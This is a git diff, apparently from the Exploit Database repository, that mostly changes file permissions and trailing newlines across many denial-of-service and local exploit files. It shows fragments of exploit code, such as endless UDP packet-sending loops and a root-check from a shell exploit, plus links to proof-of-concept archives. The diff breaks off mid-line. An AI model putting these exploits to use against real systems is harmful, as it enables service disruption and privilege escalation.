diff --git a/platforms/multiple/dos/40101.txt b/platforms/multiple/dos/40101.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40102.txt b/platforms/multiple/dos/40102.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40103.txt b/platforms/multiple/dos/40103.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40104.txt b/platforms/multiple/dos/40104.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40105.txt b/platforms/multiple/dos/40105.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40183.html b/platforms/multiple/dos/40183.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40184.html b/platforms/multiple/dos/40184.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40194.txt b/platforms/multiple/dos/40194.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40195.txt b/platforms/multiple/dos/40195.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40197.txt b/platforms/multiple/dos/40197.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40198.txt b/platforms/multiple/dos/40198.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40199.txt b/platforms/multiple/dos/40199.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40238.txt b/platforms/multiple/dos/40238.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40307.txt b/platforms/multiple/dos/40307.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40308.txt b/platforms/multiple/dos/40308.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40309.txt b/platforms/multiple/dos/40309.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40310.txt b/platforms/multiple/dos/40310.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40311.txt b/platforms/multiple/dos/40311.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40355.txt b/platforms/multiple/dos/40355.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40356.txt b/platforms/multiple/dos/40356.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40405.txt b/platforms/multiple/dos/40405.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40420.txt b/platforms/multiple/dos/40420.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40421.txt b/platforms/multiple/dos/40421.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40510.txt b/platforms/multiple/dos/40510.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40654.txt b/platforms/multiple/dos/40654.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40955.txt b/platforms/multiple/dos/40955.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40958.c b/platforms/multiple/dos/40958.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40959.c b/platforms/multiple/dos/40959.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40994.html b/platforms/multiple/dos/40994.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41008.txt b/platforms/multiple/dos/41008.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41012.txt b/platforms/multiple/dos/41012.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41163.txt b/platforms/multiple/dos/41163.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41164.c b/platforms/multiple/dos/41164.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41165.c b/platforms/multiple/dos/41165.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41192.c b/platforms/multiple/dos/41192.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41214.html b/platforms/multiple/dos/41214.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41215.html b/platforms/multiple/dos/41215.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41216.html b/platforms/multiple/dos/41216.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41420.txt b/platforms/multiple/dos/41420.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41421.txt b/platforms/multiple/dos/41421.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41422.txt b/platforms/multiple/dos/41422.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41423.txt b/platforms/multiple/dos/41423.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41434.html b/platforms/multiple/dos/41434.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41608.txt b/platforms/multiple/dos/41608.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41609.txt b/platforms/multiple/dos/41609.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41610.txt b/platforms/multiple/dos/41610.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41611.txt b/platforms/multiple/dos/41611.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41612.txt b/platforms/multiple/dos/41612.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41660.html b/platforms/multiple/dos/41660.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41668.txt b/platforms/multiple/dos/41668.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41669.txt b/platforms/multiple/dos/41669.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41670.txt b/platforms/multiple/dos/41670.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41741.html b/platforms/multiple/dos/41741.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41742.html b/platforms/multiple/dos/41742.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41743.html b/platforms/multiple/dos/41743.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4175.php b/platforms/multiple/dos/4175.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41778.cc b/platforms/multiple/dos/41778.cc old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41792.c b/platforms/multiple/dos/41792.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41793.c b/platforms/multiple/dos/41793.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41794.c b/platforms/multiple/dos/41794.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41796.c b/platforms/multiple/dos/41796.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41807.html b/platforms/multiple/dos/41807.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41809.html b/platforms/multiple/dos/41809.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4181.php b/platforms/multiple/dos/4181.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41810.html b/platforms/multiple/dos/41810.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41811.html b/platforms/multiple/dos/41811.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41812.html b/platforms/multiple/dos/41812.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41813.html b/platforms/multiple/dos/41813.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41814.html b/platforms/multiple/dos/41814.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41867.html b/platforms/multiple/dos/41867.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41868.html b/platforms/multiple/dos/41868.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41869.html b/platforms/multiple/dos/41869.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41905.txt b/platforms/multiple/dos/41905.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41906.txt b/platforms/multiple/dos/41906.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41931.html b/platforms/multiple/dos/41931.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41932.cpp b/platforms/multiple/dos/41932.cpp old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4196.c b/platforms/multiple/dos/4196.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/41984.txt b/platforms/multiple/dos/41984.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42017.txt b/platforms/multiple/dos/42017.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42018.txt b/platforms/multiple/dos/42018.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42019.txt b/platforms/multiple/dos/42019.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42027.html b/platforms/multiple/dos/42027.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42049.txt b/platforms/multiple/dos/42049.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42050.txt b/platforms/multiple/dos/42050.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42051.txt b/platforms/multiple/dos/42051.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42052.txt b/platforms/multiple/dos/42052.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42054.c b/platforms/multiple/dos/42054.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42055.c b/platforms/multiple/dos/42055.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42063.html b/platforms/multiple/dos/42063.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42070.c b/platforms/multiple/dos/42070.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42071.html b/platforms/multiple/dos/42071.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42072.html b/platforms/multiple/dos/42072.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42104.js b/platforms/multiple/dos/42104.js old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42108.html b/platforms/multiple/dos/42108.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42123.txt b/platforms/multiple/dos/42123.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42124.txt b/platforms/multiple/dos/42124.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42188.html b/platforms/multiple/dos/42188.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42189.html b/platforms/multiple/dos/42189.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42190.html b/platforms/multiple/dos/42190.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42191.html b/platforms/multiple/dos/42191.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42245.txt b/platforms/multiple/dos/42245.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42247.txt b/platforms/multiple/dos/42247.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42248.txt b/platforms/multiple/dos/42248.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42249.txt b/platforms/multiple/dos/42249.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42286.txt b/platforms/multiple/dos/42286.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42360.html b/platforms/multiple/dos/42360.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42361.html b/platforms/multiple/dos/42361.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42362.html b/platforms/multiple/dos/42362.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42363.html b/platforms/multiple/dos/42363.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42364.html b/platforms/multiple/dos/42364.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42365.html b/platforms/multiple/dos/42365.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42366.html b/platforms/multiple/dos/42366.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42367.html b/platforms/multiple/dos/42367.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42373.html b/platforms/multiple/dos/42373.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42374.html b/platforms/multiple/dos/42374.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42375.html b/platforms/multiple/dos/42375.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42376.html b/platforms/multiple/dos/42376.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42377.txt b/platforms/multiple/dos/42377.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4260.php b/platforms/multiple/dos/4260.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42602.html b/platforms/multiple/dos/42602.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42604.html b/platforms/multiple/dos/42604.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42666.txt b/platforms/multiple/dos/42666.txt old mode 100755 new mode 100644 index 29180abfc..9bd0dc67f --- a/platforms/multiple/dos/42666.txt +++ b/platforms/multiple/dos/42666.txt @@ -76,5 +76,4 @@ for (let i in {xx: 0}) { o[i]; i = new Uint32Array([0, 1, 0x777777, 0, 0]); } -} - +} \ No newline at end of file diff --git a/platforms/multiple/dos/42781.txt b/platforms/multiple/dos/42781.txt old mode 100755 new mode 100644 index ceafe6a3b..2634d0f12 --- a/platforms/multiple/dos/42781.txt +++ b/platforms/multiple/dos/42781.txt @@ -5,4 +5,4 @@ The attached MP4 file causes an out-of-bounds memory access when played in flash Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42781.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42781.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42782.txt b/platforms/multiple/dos/42782.txt old mode 100755 new mode 100644 index 9ed82a2ec..28e65c586 --- a/platforms/multiple/dos/42782.txt +++ b/platforms/multiple/dos/42782.txt @@ -5,4 +5,4 @@ The attached fuzzed MP4 file causes an out-of-bounds memory access when played w Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42782.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42782.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42783.txt b/platforms/multiple/dos/42783.txt old mode 100755 new mode 100644 index a410520ff..34827ea97 --- a/platforms/multiple/dos/42783.txt +++ b/platforms/multiple/dos/42783.txt @@ -5,4 +5,4 @@ The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42783.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42783.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42941.py b/platforms/multiple/dos/42941.py index 6c8d9aece..71e6ea726 100755 --- a/platforms/multiple/dos/42941.py +++ b/platforms/multiple/dos/42941.py @@ -202,4 +202,4 @@ if __name__ == '__main__': while True: udp_handler(sock_udp) - sock_udp.close() + sock_udp.close() \ No newline at end of file diff --git a/platforms/multiple/dos/42942.py b/platforms/multiple/dos/42942.py index 0d01bc7c0..e20ccdc2c 100755 --- a/platforms/multiple/dos/42942.py +++ b/platforms/multiple/dos/42942.py @@ -142,4 +142,4 @@ if __name__ == '__main__': b"A" * 255 * 8, ]) - send_packet(pkg, host) + send_packet(pkg, host) \ No newline at end of file diff --git a/platforms/multiple/dos/42943.py b/platforms/multiple/dos/42943.py index b58e62513..9ad909e0e 100755 --- a/platforms/multiple/dos/42943.py +++ b/platforms/multiple/dos/42943.py @@ -148,4 +148,4 @@ if __name__ == '__main__': ]) host, port = sys.argv[1:] - send_packet(pkg, host, int(port)) + send_packet(pkg, host, int(port)) \ No newline at end of file diff --git a/platforms/multiple/dos/42944.py b/platforms/multiple/dos/42944.py index 8bc2b2228..9faec41f2 100755 --- a/platforms/multiple/dos/42944.py +++ b/platforms/multiple/dos/42944.py @@ -105,4 +105,4 @@ if __name__ == '__main__': # Dump response with open('response.bin', 'wb') as f: - f.write(s.recvfrom(N_BYTES)[0]) + f.write(s.recvfrom(N_BYTES)[0]) \ No newline at end of file diff --git a/platforms/multiple/dos/42945.py b/platforms/multiple/dos/42945.py index 1dead3cfa..ce0ad01b6 100755 --- a/platforms/multiple/dos/42945.py +++ b/platforms/multiple/dos/42945.py @@ -58,4 +58,4 @@ if __name__ == '__main__': while True: s.sendto(packet, (ip, port)) #break - s.close() + s.close() \ No newline at end of file diff --git a/platforms/multiple/dos/42946.py b/platforms/multiple/dos/42946.py index b8bb4de93..efc9ffd30 100755 --- a/platforms/multiple/dos/42946.py +++ b/platforms/multiple/dos/42946.py @@ -96,4 +96,4 @@ if __name__ == '__main__': s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1) s.sendto(packet, (ip, port)) - s.close() + s.close() \ No newline at end of file diff --git a/platforms/multiple/dos/42955.html b/platforms/multiple/dos/42955.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/42969.rb b/platforms/multiple/dos/42969.rb index a5b748f39..6d2a6ff88 100755 --- a/platforms/multiple/dos/42969.rb +++ b/platforms/multiple/dos/42969.rb @@ -59,5 +59,4 @@ while (true) try { print_status('Sending response') send_response(cli, @html) end -end - +end \ No newline at end of file diff --git a/platforms/multiple/dos/43020.txt b/platforms/multiple/dos/43020.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/43133.php b/platforms/multiple/dos/43133.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/433.c b/platforms/multiple/dos/433.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4359.txt b/platforms/multiple/dos/4359.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4432.html b/platforms/multiple/dos/4432.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4559.txt b/platforms/multiple/dos/4559.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4601.txt b/platforms/multiple/dos/4601.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4615.txt b/platforms/multiple/dos/4615.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4856.php b/platforms/multiple/dos/4856.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/4997.sql b/platforms/multiple/dos/4997.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/5191.c b/platforms/multiple/dos/5191.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/5229.txt b/platforms/multiple/dos/5229.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/5268.html b/platforms/multiple/dos/5268.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/5306.txt b/platforms/multiple/dos/5306.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/5679.php b/platforms/multiple/dos/5679.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6029.txt b/platforms/multiple/dos/6029.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6046.txt b/platforms/multiple/dos/6046.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6174.txt b/platforms/multiple/dos/6174.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6218.txt b/platforms/multiple/dos/6218.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6237.txt b/platforms/multiple/dos/6237.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6239.txt b/platforms/multiple/dos/6239.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6252.txt b/platforms/multiple/dos/6252.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6293.txt b/platforms/multiple/dos/6293.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6472.c b/platforms/multiple/dos/6472.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6622.txt b/platforms/multiple/dos/6622.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/6805.txt b/platforms/multiple/dos/6805.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7330.c b/platforms/multiple/dos/7330.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7467.txt b/platforms/multiple/dos/7467.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7520.c b/platforms/multiple/dos/7520.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7643.txt b/platforms/multiple/dos/7643.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7647.txt b/platforms/multiple/dos/7647.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7673.html b/platforms/multiple/dos/7673.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/7822.c b/platforms/multiple/dos/7822.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8091.html b/platforms/multiple/dos/8091.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8219.html b/platforms/multiple/dos/8219.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8241.txt b/platforms/multiple/dos/8241.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8245.c b/platforms/multiple/dos/8245.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8285.txt b/platforms/multiple/dos/8285.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8308.c b/platforms/multiple/dos/8308.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8333.txt b/platforms/multiple/dos/8333.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8337.c b/platforms/multiple/dos/8337.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8646.php b/platforms/multiple/dos/8646.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8669.c b/platforms/multiple/dos/8669.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/867.c b/platforms/multiple/dos/867.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8695.txt b/platforms/multiple/dos/8695.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8720.c b/platforms/multiple/dos/8720.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8794.htm b/platforms/multiple/dos/8794.htm old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8822.txt b/platforms/multiple/dos/8822.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8826.txt b/platforms/multiple/dos/8826.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8873.c b/platforms/multiple/dos/8873.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8957.txt b/platforms/multiple/dos/8957.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/8991.php b/platforms/multiple/dos/8991.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9071.txt b/platforms/multiple/dos/9071.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9085.txt b/platforms/multiple/dos/9085.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9160.txt b/platforms/multiple/dos/9160.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9175.txt b/platforms/multiple/dos/9175.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9198.txt b/platforms/multiple/dos/9198.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9300.c b/platforms/multiple/dos/9300.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9323.txt b/platforms/multiple/dos/9323.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/94.c b/platforms/multiple/dos/94.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9454.txt b/platforms/multiple/dos/9454.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/946.c b/platforms/multiple/dos/946.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/948.c b/platforms/multiple/dos/948.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/956.c b/platforms/multiple/dos/956.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9731.txt b/platforms/multiple/dos/9731.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/984.c b/platforms/multiple/dos/984.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9969.txt b/platforms/multiple/dos/9969.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/9987.txt b/platforms/multiple/dos/9987.txt old mode 100755 new mode 100644 index 926fc98b9..ba6fef551 --- a/platforms/multiple/dos/9987.txt +++ b/platforms/multiple/dos/9987.txt @@ -66,5 +66,4 @@ def main(argc , argv): if (__name__ == "__main__"): - sys.exit(main(len(sys.argv), sys.argv)) - \ No newline at end of file + sys.exit(main(len(sys.argv), sys.argv)) \ No newline at end of file diff --git a/platforms/multiple/local/10072.c b/platforms/multiple/local/10072.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10207.txt b/platforms/multiple/local/10207.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10264.txt b/platforms/multiple/local/10264.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10265.txt b/platforms/multiple/local/10265.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10266.txt b/platforms/multiple/local/10266.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10267.txt b/platforms/multiple/local/10267.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10268.txt b/platforms/multiple/local/10268.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10326.txt b/platforms/multiple/local/10326.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/10544.html b/platforms/multiple/local/10544.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/11029.txt b/platforms/multiple/local/11029.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/1119.txt b/platforms/multiple/local/1119.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/11364.txt b/platforms/multiple/local/11364.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/11561.html b/platforms/multiple/local/11561.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/11789.c b/platforms/multiple/local/11789.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/12103.txt b/platforms/multiple/local/12103.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/15475.txt b/platforms/multiple/local/15475.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/1554.c b/platforms/multiple/local/1554.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/1719.txt b/platforms/multiple/local/1719.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/17318.php b/platforms/multiple/local/17318.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/17486.php b/platforms/multiple/local/17486.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/18959.txt b/platforms/multiple/local/18959.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19139.py b/platforms/multiple/local/19139.py index 399326109..2d78bf169 100755 --- a/platforms/multiple/local/19139.py +++ b/platforms/multiple/local/19139.py @@ -732,4 +732,4 @@ class PDFDoc(): doc1+=trailer.__str__() doc1+="\nstartxref\n%d\n"%posxref doc1+="%%EOF" - return doc1 \ No newline at end of file + return doc1 \ No newline at end of file diff --git a/platforms/multiple/local/1924.txt b/platforms/multiple/local/1924.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19430.txt b/platforms/multiple/local/19430.txt old mode 100755 new mode 100644 index d7851d6e0..b9b689efe --- a/platforms/multiple/local/19430.txt +++ b/platforms/multiple/local/19430.txt @@ -121,4 +121,4 @@ used to put the \fIstring\fP into the given \fIstream\fP .BR troff (1). .SH AUTHOR -Pawel Wilk <siewca@dione.ids.pl> \ No newline at end of file +Pawel Wilk <siewca@dione.ids.pl> \ No newline at end of file diff --git a/platforms/multiple/local/19447.c b/platforms/multiple/local/19447.c old mode 100755 new mode 100644 index 510e17c7f..572a97ce7 --- a/platforms/multiple/local/19447.c +++ b/platforms/multiple/local/19447.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/570/info Some *BSD's use a profil(2) system call that dates back to "version 6" unix. This system call arranges for the kernel to sample the PC and increment an element of an array on every profile clock tick. @@ -9,8 +10,7 @@ As the size and location of this array as well as the scale factor are under the Although unlikely, it is theoretically possible that an attacker with local access and knowledge of the addresses used by privileged programs could construct an exploit. It may be that there are no candidate addresses that, when incremented, result in a security failure. However, as this can turn -1 into 0, and 0 into 1, and as security-related system calls and library functions often return either -1 or 0, this mechanism could turn system call returns of success into failure or failure into success if a program stores system call results into memory locations. - -Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com. The following program will test for the vulnerability although not exploit it: +*/ /* This program will check to see if a given system has the profil(2) bug described in NetBSD Security Advisory 1999-011. If it prints `Counting!' @@ -62,6 +62,4 @@ twobins[0] = twobins[1] = 0; } } -/* ross.harvey@computer.org */ - - \ No newline at end of file +/* ross.harvey@computer.org */ \ No newline at end of file diff --git a/platforms/multiple/local/19461.c b/platforms/multiple/local/19461.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19480.c b/platforms/multiple/local/19480.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19497.c b/platforms/multiple/local/19497.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19498.sh b/platforms/multiple/local/19498.sh index 144f0add5..64d8e3283 100755 --- a/platforms/multiple/local/19498.sh +++ b/platforms/multiple/local/19498.sh @@ -125,4 +125,4 @@ if [ -f /tmp/root_was_here ]; then echo "created file /tmp/root_was_here" else echo "exploit failed..." -fi \ No newline at end of file +fi \ No newline at end of file diff --git a/platforms/multiple/local/19547.txt b/platforms/multiple/local/19547.txt old mode 100755 new mode 100644 diff 